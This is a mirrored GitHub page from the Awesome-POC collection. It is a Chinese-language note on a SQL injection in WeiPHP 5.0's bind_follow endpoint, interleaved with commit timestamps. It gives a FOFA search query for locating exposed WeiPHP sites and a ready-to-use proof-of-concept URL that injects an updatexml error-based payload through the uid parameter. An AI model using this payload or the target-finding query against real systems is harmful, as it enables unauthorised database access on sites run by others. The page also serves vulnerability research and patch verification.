admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/CMS漏洞/WeiPHP5.0 bind_follow SQL注入漏洞.md

29 lines
486 B
Markdown
Raw Normal View History

update gitbook
2022-02-20 16:14:31 +08:00
# WeiPHP5.0 bind_follow SQL注入漏洞
## 漏洞描述
Weiphp5.0 所有使用了 wp_where() 函数并且参数可控的SQL查询均受到影响前台后台均存在注入。
## 漏洞影响
```
Weiphp5.0
```
更新漏洞
2023-08-28 15:55:36 +08:00
## 网络测绘
update gitbook
2022-02-20 16:14:31 +08:00
```
app="WeiPHP"
```
## 漏洞复现
登陆页面
更新漏洞
2022-12-05 11:09:28 +08:00
![img](./images/202202162318466.png)
update gitbook
2022-02-20 16:14:31 +08:00
验证POC
```php
/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(%271%27),0x7e),1)--+
```
Reference in New Issue Copy Permalink